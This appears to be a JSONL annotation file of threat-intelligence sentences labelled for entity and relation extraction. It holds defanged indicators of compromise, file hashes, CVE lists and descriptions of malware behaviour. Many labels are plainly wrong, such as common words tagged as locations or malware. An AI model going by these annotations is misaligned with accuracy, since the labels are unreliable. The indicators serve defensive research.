{"id":1986,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) HelloXD is a ransomware family performing double extortion attacks that surfaced in November 2021.","entities":[{"id":45202,"label":"malware","start_offset":53,"end_offset":60},{"id":45203,"label":"TIME","start_offset":137,"end_offset":150},{"id":45205,"label":"attack-pattern","start_offset":95,"end_offset":111}],"relations":[{"id":81,"from_id":45202,"to_id":45205,"type":"uses"}],"Comments":[]} {"id":444,"text":"Here the site itself has been attacked, and the site owners are also victims.","entities":[],"relations":[],"Comments":[]} {"id":2987,"text":"All modern tablets and smartphones have settings you should enable before you take these portable devices out of your home: a. Passcodes to lock the device.","entities":[],"relations":[],"Comments":[]} {"id":3798,"text":"When we tracked ChessMaster back in November, we noted that it exploited the SOAP WSDL parser vulnerability CVE-2017-8759 (patched in September 2017) within the Microsoft .NET framework to download additional malware.","entities":[{"id":49661,"label":"malware","start_offset":16,"end_offset":27},{"id":49664,"label":"TIME","start_offset":134,"end_offset":148},{"id":49666,"label":"vulnerability","start_offset":77,"end_offset":121},{"id":49662,"label":"TIME","start_offset":36,"end_offset":44},{"id":49667,"label":"SOFTWARE","start_offset":161,"end_offset":185}],"relations":[{"id":854,"from_id":49661,"to_id":49666,"type":"exploits"},{"id":855,"from_id":49667,"to_id":49666,"type":"has"}],"Comments":[]} {"id":9050,"text":"Kill: Posts a job to kill the backdoor inject Posts a job for DLL injection Interval Changes the sleep interval Cmd","entities":[{"id":27949,"label":"location","start_offset":14,"end_offset":17},{"id":27950,"label":"location","start_offset":54,"end_offset":57},{"id":27951,"label":"malware","start_offset":112,"end_offset":115}],"relations":[],"Comments":[]} {"id":3246,"text":"If the backdoor finds that the file \u201cdebug\u201d present inside the root directory, it will wait for 130 seconds and then continue with execution. Figure 16.","entities":[],"relations":[],"Comments":[]} {"id":6919,"text":"The vulnerabilities underlying these exploits included: Internet Explorer - CVE-2018-8653 Internet Explorer - CVE-2019-0676 Chrome - CVE-2019-5786 Windows Kernel - CVE-2019-0808 Internet Explorer - CVE-2019-1367 Internet Explorer - CVE-2019-1429","entities":[],"relations":[],"Comments":[]} {"id":4808,"text":"The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites.","entities":[{"id":50724,"label":"attack-pattern","start_offset":53,"end_offset":84}],"relations":[],"Comments":[]} {"id":10672,"text":"Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 CVE-2021-40438 9 mod_proxy SSRF CVE-2020-11984 9.8 mod_proxy_uwsgi buffer overflow CVE-2019-10098 6.1 mod_rewrite potential open redirect CVE-2019-10097 7.2 CVE-2019-10097 mod_remoteip Stack buffer overflow and NULL pointer dereference CVE-2019-0190 7.5 mod_ssl 2.4.37 remote DoS when used with OpenSSL 1.1.1 CVE-2018-8011 7.5 mod_md, DoS via Coredumps on specially crafted requests CVE-2018-1303 7.5 Possible out of bound read in mod_cache_socache CVE-2018-11763 5.9 DoS for HTTP\/2 connections by continuous SETTINGS CVE-2017-9798 7.5 Use-after-free when using with an unrecognized method in .htaccess (\"OptionsBleed\") CVE-2017-9788 9.1 Uninitialized memory reflection in mod_auth_digest CVE-2017-7668 9.8 ap_find_token()","entities":[{"id":32577,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":32578,"label":"location","start_offset":15,"end_offset":18},{"id":32579,"label":"location","start_offset":52,"end_offset":58},{"id":32580,"label":"attack-pattern","start_offset":145,"end_offset":160},{"id":32581,"label":"attack-pattern","start_offset":269,"end_offset":284},{"id":32582,"label":"location","start_offset":285,"end_offset":288},{"id":32583,"label":"location","start_offset":294,"end_offset":301},{"id":32584,"label":"location","start_offset":347,"end_offset":353},{"id":32585,"label":"location","start_offset":536,"end_offset":541}],"relations":[],"Comments":[]} {"id":8646,"text":"Related IOCs lragir[.]org armradio[.]org asbares[.]com armtimes[.]net armlur[.]org armenpress[.]org hraparak[.]org armtimes[.]org hetq[.]org","entities":[],"relations":[],"Comments":[]} {"id":783,"text":"So the next time IE tries to access a freed object an invalid address exception would be raised.","entities":[{"id":46348,"label":"SOFTWARE","start_offset":17,"end_offset":20}],"relations":[],"Comments":[]} {"id":999,"text":"The descriptions for these items proposed three main uses for buyers: ","entities":[],"relations":[],"Comments":[]} {"id":6580,"text":"We also found a live service selling VPS hosting at secure[.]66[.]to.","entities":[],"relations":[],"Comments":[]} {"id":1605,"text":" Figure 3: Remote control app terms of service.","entities":[],"relations":[],"Comments":[]} {"id":3547,"text":"The Trend Micro\u2122 Deep Discovery\u2122 Email Inspector and InterScan\u2122 Web Security solutions prevent malware from ever reaching end users.","entities":[{"id":49329,"label":"tools","start_offset":53,"end_offset":62},{"id":49327,"label":"identity","start_offset":4,"end_offset":15},{"id":49328,"label":"tools","start_offset":17,"end_offset":31}],"relations":[],"Comments":[]} {"id":9278,"text":"The amount of payment information that was stolen is still unknown.","entities":[],"relations":[],"Comments":[]} {"id":9413,"text":"Based on our analysis, this group targets gambling websites.","entities":[],"relations":[],"Comments":[]} {"id":7981,"text":"In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.","entities":[{"id":24737,"label":"location","start_offset":85,"end_offset":88},{"id":24739,"label":"attack-pattern","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} {"id":4650,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} {"id":378,"text":"Vulnerable Systems CVE-2022-26134 in the Wild Cortex Managed Threat Hunting Detections of CVE-2022-26134","entities":[{"id":44726,"label":"vulnerability","start_offset":19,"end_offset":33},{"id":44727,"label":"SOFTWARE","start_offset":46,"end_offset":52},{"id":44728,"label":"vulnerability","start_offset":90,"end_offset":104}],"relations":[],"Comments":[]} {"id":3430,"text":"flash_installer.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10321,"label":"malware","start_offset":21,"end_offset":32},{"id":49121,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} {"id":4760,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":50667,"label":"attack-pattern","start_offset":69,"end_offset":77},{"id":50665,"label":"SOFTWARE","start_offset":3,"end_offset":8},{"id":50666,"label":"SOFTWARE","start_offset":31,"end_offset":36},{"id":50668,"label":"attack-pattern","start_offset":79,"end_offset":87},{"id":50669,"label":"attack-pattern","start_offset":93,"end_offset":97}],"relations":[],"Comments":[]} {"id":8625,"text":"The four exploits were used as a part of three different campaigns.","entities":[],"relations":[],"Comments":[]} {"id":58,"text":"Figure 2: Price of bitcoin in U.S. dollars from CoinMarketCap While botnets mining cryptocurrency is nothing new, the technique was much less profitable than using ransomware.","entities":[{"id":45817,"label":"SOFTWARE","start_offset":19,"end_offset":26},{"id":45818,"label":"SOFTWARE","start_offset":48,"end_offset":60}],"relations":[],"Comments":[]} {"id":5977,"text":"Recently observed Turla domains: COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to use Gmail accounts to send credential phishing emails to a variety of Google and non-Google accounts.","entities":[{"id":18388,"label":"attack-pattern","start_offset":159,"end_offset":167},{"id":18390,"label":"location","start_offset":198,"end_offset":201}],"relations":[],"Comments":[]} {"id":1378,"text":"This file is a legitimate Microsoft Windows binary.","entities":[{"id":4137,"label":"identity","start_offset":26,"end_offset":35}],"relations":[],"Comments":[]} {"id":766,"text":"This structure is created in the function MemoryProtection::CMemoryProtector::ProtectCurrentThread and is used to manage deferred free heap blocks.","entities":[],"relations":[],"Comments":[]} {"id":298,"text":"Learn more and see a detailed workflow example on the Palo Alto Networks SecOps blog, \u201cHow Xpanse Can Identify CISA-Identified Known Exploited Vulnerabilities.\u201d ","entities":[{"id":45998,"label":"identity","start_offset":111,"end_offset":115},{"id":45996,"label":"identity","start_offset":54,"end_offset":72},{"id":45997,"label":"SOFTWARE","start_offset":91,"end_offset":97}],"relations":[],"Comments":[]} {"id":12525,"text":"To protect our users, TAG routinely hunts for 0-day vulnerabilities exploited in-the-wild.","entities":[],"relations":[],"Comments":[]} {"id":12677,"text":"We have also taken extraordinary measures beyond our actions against coordinated influence operations to protect users and stop the spread of misinformation and disinformation about the war in Ukraine online.","entities":[{"id":39330,"label":"location","start_offset":119,"end_offset":122},{"id":39331,"label":"malware","start_offset":123,"end_offset":127},{"id":39332,"label":"location","start_offset":157,"end_offset":160},{"id":39333,"label":"location","start_offset":186,"end_offset":189}],"relations":[],"Comments":[]} {"id":867,"text":"While ransomware is often thought to be bullet-proof, it is certainly not always the case.","entities":[],"relations":[],"Comments":[]} {"id":7518,"text":"Variable ${prIVATE} = 959, 713 from section 1 of the PowerShell script has two values; the first number is the key and the second number is the modulus.","entities":[{"id":23368,"label":"location","start_offset":36,"end_offset":43},{"id":23370,"label":"attack-pattern","start_offset":53,"end_offset":63},{"id":23372,"label":"location","start_offset":115,"end_offset":118}],"relations":[],"Comments":[]} {"id":5068,"text":"We\u2019ll continue to take action, identify bad actors and share relevant information with others across industry and governments, with the goal of bringing awareness to these issues, protecting users and preventing future attacks.","entities":[],"relations":[],"Comments":[]} {"id":13702,"text":"Be wary of irregular emails with suspicious content such as dubious sender email, domain name, writing style, and urgent requests.","entities":[],"relations":[],"Comments":[]} {"id":11583,"text":"It also contains a minimalist agent capable of exfiltrating interesting files from the device, such as the Whatsapp database.","entities":[],"relations":[],"Comments":[]} {"id":11719,"text":"Indicator of Compromise Android Part IoCs Indicator Package name Label C2 server Detection 0c182b51ff1dffaa384651e478155632c6e65820322774e416be20e6d49bb8f9 com.example.firstandoidapp ","entities":[{"id":36115,"label":"SHA2","start_offset":97,"end_offset":161}],"relations":[],"Comments":[]} {"id":3568,"text":"While ConfuserEx is able to apply multiple transformations to the target binary, we are interested in two particular functions that we can use for correlation: Source code building.","entities":[{"id":49352,"label":"tools","start_offset":6,"end_offset":16}],"relations":[],"Comments":[]} {"id":7303,"text":" Get memory information ioreg -rd1 -c IOPlatformExpertDevice | awk '\/IOPlatformSerialNumber\/ { split($0, line, \\\"\\\\\\\"\\\"); printf(\\\"%s\\\", line[4]); }","entities":[],"relations":[],"Comments":[]} {"id":3760,"text":" This last command downloads a shell script that ultimately downloads and executes an XMRig coinminer.","entities":[{"id":49590,"label":"malware","start_offset":86,"end_offset":101}],"relations":[],"Comments":[]} {"id":5169,"text":"Despite being unknown even to industry practitioners, the Data Distribution Service (DDS) protocol has been in use for more than a decade.","entities":[],"relations":[],"Comments":[]} {"id":14152,"text":"But as we\u2019ve seen with even ransomware actors, the endpoint is being targeted less.","entities":[],"relations":[],"Comments":[]} {"id":8991,"text":"Second, one of the Linux rshell samples used the IP address 45[.]142[.]214[.]193 as its C&C.","entities":[{"id":27783,"label":"IPV4","start_offset":60,"end_offset":80}],"relations":[],"Comments":[]} {"id":2585,"text":"The Lapsus$ Group doesn\u2019t employ malware in breached victim environments, doesn\u2019t encrypt data and in most cases, doesn\u2019t actually employ extortion.","entities":[{"id":47771,"label":"attack-pattern","start_offset":26,"end_offset":40},{"id":47770,"label":"threat-actor","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":12616,"text":"It will only run at or later than 12:10 PM on any given day; if it is earlier, it will sleep for 15 seconds until it is past the said time.","entities":[{"id":39205,"label":"location","start_offset":3,"end_offset":7},{"id":39206,"label":"location","start_offset":8,"end_offset":12},{"id":39207,"label":"TIME","start_offset":34,"end_offset":42},{"id":39209,"label":"location","start_offset":82,"end_offset":86},{"id":39210,"label":"TIME","start_offset":97,"end_offset":107},{"id":39211,"label":"location","start_offset":134,"end_offset":138}],"relations":[],"Comments":[]} {"id":3847,"text":"Once ANEL evolved to \u201c5.1.1 rc,\u201d it changed its file type to an executable, while also changing the C&C server.","entities":[{"id":11661,"label":"malware","start_offset":5,"end_offset":9}],"relations":[],"Comments":[]} {"id":11507,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor\u2019s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":35205,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":35206,"label":"location","start_offset":51,"end_offset":59},{"id":35208,"label":"threat-actor","start_offset":82,"end_offset":90},{"id":35209,"label":"tools","start_offset":158,"end_offset":164}],"relations":[],"Comments":[]} {"id":10345,"text":"The code inside the BLUE box constructs the main Powershell commands and scripts.","entities":[{"id":31516,"label":"location","start_offset":20,"end_offset":24},{"id":31517,"label":"attack-pattern","start_offset":49,"end_offset":59},{"id":31518,"label":"location","start_offset":69,"end_offset":72}],"relations":[],"Comments":[]} {"id":4214,"text":"In addition, the application now retrieves the last known location and uses the development platform Google Firebase to upload the stolen content.","entities":[{"id":50029,"label":"SOFTWARE","start_offset":101,"end_offset":116}],"relations":[],"Comments":[]} {"id":12322,"text":"We terminated 1 blog as part of our investigation into coordinated influence operations linked to Argentina.","entities":[],"relations":[],"Comments":[]} {"id":2984,"text":"This also is an important lesson for kids to understand that privacy on computers isn\u2019t absolute: the admin can always look at what they\u2019re doing.","entities":[],"relations":[],"Comments":[]} {"id":1831,"text":"Detecting and deleting Mimikatz We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver).","entities":[{"id":5382,"label":"tools","start_offset":23,"end_offset":31},{"id":5383,"label":"tools","start_offset":53,"end_offset":63},{"id":46962,"label":"SOFTWARE","start_offset":144,"end_offset":169},{"id":46963,"label":"FILEPATH","start_offset":117,"end_offset":129},{"id":46964,"label":"attack-pattern","start_offset":71,"end_offset":102}],"relations":[{"id":278,"from_id":46962,"to_id":46963,"type":"consists-of"}],"Comments":[]} {"id":3730,"text":"On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation.","entities":[{"id":49530,"label":"vulnerability","start_offset":99,"end_offset":113},{"id":49531,"label":"vulnerability","start_offset":118,"end_offset":132},{"id":49533,"label":"SOFTWARE","start_offset":187,"end_offset":203},{"id":49534,"label":"SOFTWARE","start_offset":208,"end_offset":227},{"id":49532,"label":"SOFTWARE","start_offset":158,"end_offset":185},{"id":49528,"label":"TIME","start_offset":3,"end_offset":16},{"id":49529,"label":"identity","start_offset":18,"end_offset":24}],"relations":[{"id":821,"from_id":49532,"to_id":49530,"type":"has"},{"id":822,"from_id":49532,"to_id":49531,"type":"has"},{"id":823,"from_id":49533,"to_id":49530,"type":"has"},{"id":824,"from_id":49533,"to_id":49531,"type":"has"},{"id":825,"from_id":49534,"to_id":49530,"type":"has"},{"id":826,"from_id":49534,"to_id":49531,"type":"has"}],"Comments":[]} {"id":4048,"text":"After further analysis, we found that the threat group developed multiple backdoors capable of communication via common network protocols.","entities":[],"relations":[],"Comments":[]} {"id":12487,"text":"We terminated 3,317 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China.","entities":[],"relations":[],"Comments":[]} {"id":2264,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 2022.","entities":[{"id":47333,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} {"id":1312,"text":"An example upload of these results can be seen below: PlugX PlugX is a backdoor that is often used by actors in targeted attacks.","entities":[{"id":3977,"label":"malware","start_offset":55,"end_offset":60},{"id":3978,"label":"malware","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} {"id":2917,"text":"In October 2017, Palo Alto Networks Unit 42 published research showing how attackers were adapting attack techniques to generate cryptocurrency for themselves.","entities":[{"id":48089,"label":"TIME","start_offset":3,"end_offset":15},{"id":48090,"label":"identity","start_offset":17,"end_offset":43}],"relations":[],"Comments":[]} {"id":8675,"text":"Related IOCs supportcdn.web[.]app vegmobile[.]com 111.90.146[.]198","entities":[{"id":26782,"label":"IPV4","start_offset":50,"end_offset":66}],"relations":[],"Comments":[]} {"id":10195,"text":"During the pandemic, we also uncovered attackers posing as news providers with a \u201cCovid19 news software.\u201d","entities":[],"relations":[],"Comments":[]} {"id":3253,"text":" Figure 17.","entities":[],"relations":[],"Comments":[]} {"id":4757,"text":"On Search, Google\u2019s Safe Browsing is an industry-leading service to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50662,"label":"SOFTWARE","start_offset":11,"end_offset":33}],"relations":[],"Comments":[]} {"id":12869,"text":" Figure 2 - A Technique detection named \"Clipboard Data or Screenshot Collection via PowerShell\" was generated when powershell.exe executed CopyFromScreen(). The adversary uses privilege escalation, which commonly involves taking advantage of pre-existing system weaknesses, misconfigurations, and vulnerabilities to gain higher permissions.","entities":[{"id":40092,"label":"attack-pattern","start_offset":46,"end_offset":60},{"id":40093,"label":"attack-pattern","start_offset":90,"end_offset":100},{"id":40094,"label":"attack-pattern","start_offset":186,"end_offset":206},{"id":40095,"label":"location","start_offset":303,"end_offset":306}],"relations":[],"Comments":[]} {"id":5155,"text":"They're going to buy everything that they need and everything that they see as an opportunity, right?","entities":[],"relations":[],"Comments":[]} {"id":6624,"text":" https:\/\/attack.mitre.org\/groups\/G0064\/","entities":[],"relations":[],"Comments":[]} {"id":5793,"text":"Maybe explain to the audience what hybrid warfare or cyber warfare is.","entities":[],"relations":[],"Comments":[]} {"id":26,"text":"It\u2019s a subject Unit 42 has been tracking in the past year:","entities":[{"id":45810,"label":"identity","start_offset":15,"end_offset":22}],"relations":[],"Comments":[]} {"id":3065,"text":"Since the detection result is fake, the subsequent cleaning is not real either \u2013 the elimination operation is just marking a flag of \"initial_virus_cleared\" to \u201c1\u201d in the app\u2019s internal database.","entities":[],"relations":[],"Comments":[]} {"id":3971,"text":" As observed on CVE-2020-0688, the use of static keys \u2014 as opposed to randomly generated keys \u2014 can allow an attacker to execute arbitrary code by tricking the server into deserializing ViewState data.","entities":[{"id":49830,"label":"vulnerability","start_offset":16,"end_offset":29},{"id":49831,"label":"attack-pattern","start_offset":121,"end_offset":143}],"relations":[{"id":868,"from_id":49830,"to_id":49831,"type":"uses"}],"Comments":[]} {"id":1927,"text":"One of the RTF files was found in a server related to Confucius (f1a54dca2fdfe59ec3f537148460364fb5d046c9b4e7db5fc819a9732ae0e063, detected as TROJ_CVE201711882.AG), while the other one (434d34c0502910c562f5c6840694737a2c82a8c44004fa58c7c457b08aac17bd,detected as Mal_CVE20170199-2) downloaded a VB Backdoor that pings back to twitck[.]com, a domain name belonging to Urpage.","entities":[{"id":5662,"label":"SHA2","start_offset":187,"end_offset":251},{"id":5659,"label":"threat-actor","start_offset":54,"end_offset":63},{"id":5660,"label":"SHA2","start_offset":65,"end_offset":129},{"id":47051,"label":"malware","start_offset":143,"end_offset":163},{"id":47052,"label":"malware","start_offset":264,"end_offset":281},{"id":47053,"label":"DOMAIN","start_offset":327,"end_offset":339},{"id":47054,"label":"threat-actor","start_offset":368,"end_offset":374}],"relations":[{"id":293,"from_id":5660,"to_id":5659,"type":"authored-by"},{"id":294,"from_id":47051,"to_id":5660,"type":"related-to"},{"id":295,"from_id":47051,"to_id":5659,"type":"authored-by"},{"id":296,"from_id":5662,"to_id":5659,"type":"authored-by"},{"id":297,"from_id":47052,"to_id":5659,"type":"authored-by"},{"id":298,"from_id":47052,"to_id":47053,"type":"beacons-to"},{"id":299,"from_id":47054,"to_id":47053,"type":"controls"}],"Comments":[]} {"id":963,"text":"The message body and sender phone number are collected as shown in Figure 2. Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":744,"text":"Of those vulnerabilities, 4 were actively being exploited in the wild.","entities":[],"relations":[],"Comments":[]} {"id":915,"text":" Figure 7. HTTP POST request indicating a folder is being scanned This resulted in over 1,000 requests being made on a sandbox machine, which contained little data of interest.","entities":[],"relations":[],"Comments":[]} {"id":5253,"text":"We analyzed seven apps that were actually AnubisSpy.","entities":[{"id":51294,"label":"malware","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} {"id":3528,"text":"Protux\u2019s latest version, 3.7, uses the open-source compiler OpenCSP to generate a session key with the RSA algorithm.","entities":[{"id":10665,"label":"malware","start_offset":0,"end_offset":6},{"id":49309,"label":"tools","start_offset":60,"end_offset":67}],"relations":[{"id":781,"from_id":10665,"to_id":49309,"type":"uses"}],"Comments":[]} {"id":5064,"text":"The new technique, displayed below, draws a login page that appears to be on the passport.i.ua domain, overtop of the page hosted on the compromised site.","entities":[{"id":51171,"label":"DOMAIN","start_offset":81,"end_offset":94}],"relations":[],"Comments":[]} {"id":9223,"text":"What happened?","entities":[],"relations":[],"Comments":[]} {"id":7937,"text":"Both methods use a system application called PackageInstaller to complete the installation.","entities":[],"relations":[],"Comments":[]} {"id":86,"text":"3. Criminals will find ways to target these attacks.","entities":[],"relations":[],"Comments":[]} {"id":11192,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten\u2019s objectives.","entities":[{"id":34266,"label":"location","start_offset":5,"end_offset":9},{"id":34268,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[],"Comments":[]} {"id":3013,"text":"Voice assistants are some of the newest devices out there, which means they\u2019re the least known and understood.","entities":[],"relations":[],"Comments":[]} {"id":11686,"text":"\u201cIndia reaction after new pak map.pdf\u201d \u2013 a document talking about India\u2019s response to the new political map revealed by Pakistan in August.","entities":[],"relations":[],"Comments":[]} {"id":7600,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":13911,"text":" Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":1037,"text":"Their response was that they were addressing this issue and have already removed a number of these items, with the remainder requiring further investigation.","entities":[],"relations":[],"Comments":[]} {"id":4103,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":1738,"text":"Attackers know that people will click on links in email.","entities":[],"relations":[],"Comments":[]} {"id":5783,"text":"It\u2019s great to be here.","entities":[],"relations":[],"Comments":[]} {"id":2202,"text":"The filename is derived by randomly choosing an executable name from the system32 directory.","entities":[{"id":47317,"label":"FILEPATH","start_offset":73,"end_offset":81}],"relations":[],"Comments":[]} {"id":662,"text":"Nearly all of us have a use for Microsoft Office documents.","entities":[{"id":46243,"label":"SOFTWARE","start_offset":32,"end_offset":48}],"relations":[],"Comments":[]} {"id":5036,"text":"The targets, primarily located in Lithuania, were sent links to attacker controlled domains from a domain spoofing the Facebook security team.","entities":[{"id":51110,"label":"identity","start_offset":119,"end_offset":141},{"id":51109,"label":"location","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} {"id":1669,"text":"At this point, the key exchange is complete and both client and server hold the same two keys, which they can use to encrypt and decrypt traffic.","entities":[],"relations":[],"Comments":[]} {"id":2137,"text":"Organizations can and should prioritize scheduling and deployment of the security updates based on their security policy and risk assessment, and on currently available information.","entities":[],"relations":[],"Comments":[]} {"id":1898,"text":"Original (top) and modified (bottom) website","entities":[],"relations":[],"Comments":[]} {"id":5684,"text":"Since mid-2021, we have been investigating a rather elusive threat actor called Earth Lusca that targets organizations globally via a campaign that uses traditional social engineering techniques such as spear phishing and watering holes.","entities":[{"id":17527,"label":"location","start_offset":134,"end_offset":142},{"id":17528,"label":"attack-pattern","start_offset":203,"end_offset":217},{"id":17529,"label":"location","start_offset":218,"end_offset":221}],"relations":[],"Comments":[]} {"id":2606,"text":" Owing to the diversity of techniques used, and the lack of use of malware, there is no single defense against or detection of Lapsus$ attacks specifically. ","entities":[{"id":7883,"label":"threat-actor","start_offset":127,"end_offset":134}],"relations":[],"Comments":[]} {"id":1980,"text":"We can see the first packet is a normal ClientHello sent by the client, and the second packet is a crafted packet sent by the server. In order to examine exploitation of this vulnerability, we used WinDBG to attach to the lsass.exe process.","entities":[{"id":47093,"label":"FILEPATH","start_offset":223,"end_offset":232},{"id":47092,"label":"SOFTWARE","start_offset":199,"end_offset":205}],"relations":[],"Comments":[]} {"id":1302,"text":"The 'gh204503254' data that was previously downloaded is used as the key.","entities":[],"relations":[],"Comments":[]} {"id":7246,"text":"Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events.","entities":[{"id":22647,"label":"attack-pattern","start_offset":42,"end_offset":48}],"relations":[],"Comments":[]} {"id":3090,"text":" Security updates to address these vulnerabilities began to be released prior to disclosure on January 3, 2018.","entities":[{"id":45767,"label":"TIME","start_offset":95,"end_offset":110}],"relations":[],"Comments":[]} {"id":5725,"text":"Attackers will cast a wide net, with no regard to who the victims are, hoping that a decent percentage of attacks are successful.","entities":[{"id":17691,"label":"location","start_offset":10,"end_offset":14},{"id":17692,"label":"identity","start_offset":15,"end_offset":19},{"id":17693,"label":"tools","start_offset":27,"end_offset":30},{"id":17694,"label":"location","start_offset":66,"end_offset":69},{"id":17695,"label":"location","start_offset":114,"end_offset":117}],"relations":[],"Comments":[]} {"id":1757,"text":"And before long, Yuki Chen (@guhe120), a Chinese researcher, posted his answer.","entities":[{"id":46908,"label":"identity","start_offset":28,"end_offset":36},{"id":46907,"label":"identity","start_offset":17,"end_offset":26},{"id":46909,"label":"location","start_offset":41,"end_offset":48}],"relations":[{"id":254,"from_id":46907,"to_id":46908,"type":"duplicate-of"},{"id":255,"from_id":46907,"to_id":46909,"type":"located-at"},{"id":256,"from_id":46908,"to_id":46909,"type":"located-at"}],"Comments":[]} {"id":14108,"text":"Analyzing the compile time of binaries between different samples can also provide a level of correlation between samples.","entities":[],"relations":[],"Comments":[]} {"id":2512,"text":"The group has spent more than a year attacking organizations where IT outages can have life-threatening consequences: hospitals, 911 dispatch carriers, emergency medical services and law enforcement agencies.","entities":[],"relations":[],"Comments":[]} {"id":1304,"text":"The following example response will instruct the malware to download a remote executable file: 'filename.exe' is the path where the downloaded file will be stored, and '01234567890123456789012345678901' is the value supplied in the subsequent HTTP request.","entities":[{"id":46665,"label":"FILEPATH","start_offset":97,"end_offset":109}],"relations":[],"Comments":[]} {"id":10060,"text":" Figure 10. .satan file Conclusion","entities":[],"relations":[],"Comments":[]} {"id":9166,"text":"By then, Angler\u2019s activities already ceased.","entities":[],"relations":[],"Comments":[]} {"id":1090,"text":"In the above example, the resource being protected isn\u2019t the right to speak, as many might think, but rather the ability to listen.","entities":[],"relations":[],"Comments":[]} {"id":691,"text":"This means that RTF documents expose the same attack surface as Internet Explorer!","entities":[{"id":46269,"label":"SOFTWARE","start_offset":64,"end_offset":81}],"relations":[],"Comments":[]} {"id":299,"text":"Updated April 1, 2022, at 11 a.m. PT.","entities":[{"id":45999,"label":"TIME","start_offset":8,"end_offset":37}],"relations":[],"Comments":[]} {"id":10589,"text":"The majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues.","entities":[],"relations":[],"Comments":[]} {"id":548,"text":" Ransom notes from Makop, Dharma, Ryuk, DearCry and others, sometimes ask victims to reach out to them via email.","entities":[{"id":46164,"label":"malware","start_offset":19,"end_offset":24},{"id":46166,"label":"malware","start_offset":34,"end_offset":38},{"id":46167,"label":"malware","start_offset":40,"end_offset":47},{"id":46165,"label":"malware","start_offset":26,"end_offset":32}],"relations":[],"Comments":[]} {"id":11430,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[{"id":34912,"label":"malware","start_offset":83,"end_offset":90},{"id":34913,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} {"id":1190,"text":" Some of these third-party SDKs provide IAP services based on existing online payment platforms.","entities":[],"relations":[],"Comments":[]} {"id":3452,"text":" Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":5411,"text":"The vendors that were targeted by VPNFilter were Asus, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL, and ZDE.","entities":[{"id":51412,"label":"identity","start_offset":99,"end_offset":103},{"id":51415,"label":"identity","start_offset":135,"end_offset":138},{"id":51409,"label":"identity","start_offset":71,"end_offset":78},{"id":51410,"label":"identity","start_offset":80,"end_offset":88},{"id":51405,"label":"malware","start_offset":34,"end_offset":43},{"id":51406,"label":"identity","start_offset":49,"end_offset":53},{"id":51407,"label":"identity","start_offset":55,"end_offset":61},{"id":51408,"label":"identity","start_offset":63,"end_offset":69},{"id":51411,"label":"identity","start_offset":90,"end_offset":97},{"id":51413,"label":"identity","start_offset":105,"end_offset":112},{"id":51414,"label":"identity","start_offset":114,"end_offset":122}],"relations":[{"id":1084,"from_id":51405,"to_id":51406,"type":"targets"},{"id":1085,"from_id":51405,"to_id":51407,"type":"targets"},{"id":1086,"from_id":51405,"to_id":51408,"type":"targets"},{"id":1087,"from_id":51405,"to_id":51409,"type":"targets"},{"id":1089,"from_id":51405,"to_id":51411,"type":"targets"},{"id":1090,"from_id":51405,"to_id":51412,"type":"targets"},{"id":1091,"from_id":51405,"to_id":51413,"type":"targets"},{"id":1088,"from_id":51405,"to_id":51410,"type":"targets"},{"id":1092,"from_id":51405,"to_id":51414,"type":"targets"},{"id":1093,"from_id":51405,"to_id":51415,"type":"targets"}],"Comments":[]} {"id":2380,"text":"Many of the StealthMutant samples we have analyzed use AES-256-ECB for decryption; alternatively, an earlier variant of the loader uses XOR.","entities":[{"id":47443,"label":"malware","start_offset":12,"end_offset":25}],"relations":[],"Comments":[]} {"id":9554,"text":"We have seen it deployed against fewer than two dozen accounts located in Iran.","entities":[],"relations":[],"Comments":[]} {"id":8181,"text":" Figure 3. Letter confirming the changes in the company\u2019s bank reference.","entities":[],"relations":[],"Comments":[]} {"id":4514,"text":"The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.","entities":[{"id":50314,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":9829,"text":" Figure 6. Code showing down_new\u2019s command function Table 